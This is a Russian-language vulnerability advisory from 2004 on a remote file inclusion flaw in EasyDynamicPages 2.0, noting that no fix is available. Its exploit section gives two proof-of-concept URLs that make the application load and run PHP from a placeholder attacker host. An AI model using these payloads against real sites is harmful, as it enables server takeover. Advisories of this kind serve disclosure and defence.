Удаленное выполнение произвольного кода в EasyDynamicPages

Дата публикации:
04.01.2004
Всего просмотров:
664
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
EasyDynamicPages 2.x
Уязвимые версии: EasyDynamicPages 2.0

Описание: Уязвимость включения файла обнаружена в EasyDynamicPages. Удаленный пользователь может выполнить произвольный PHP код и команды операционной системы на целевой системе.

Файлы '/admin/config.php' и '/dynamicpages/fast/config_page.php' включают файлы без проверки включаемых файлов. В результате удаленный пользователь может представить специально обработанный URL, который выполнит произвольный PHP файл, расположенный на удаленной системе.

Пример/Эксплоит:

http://[target]/admin/config.php/edp_relative_path=http://[attacker]/

http://[target]/dynamicpages/fast/config_page.p hp?do=add_page&du=site&edp_relative_path=http://attacker/

URL производителя: http://software.stoitsov.com

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: include() vuln in EasyDynamicPages v.2.0

или введите имя

CAPTCHA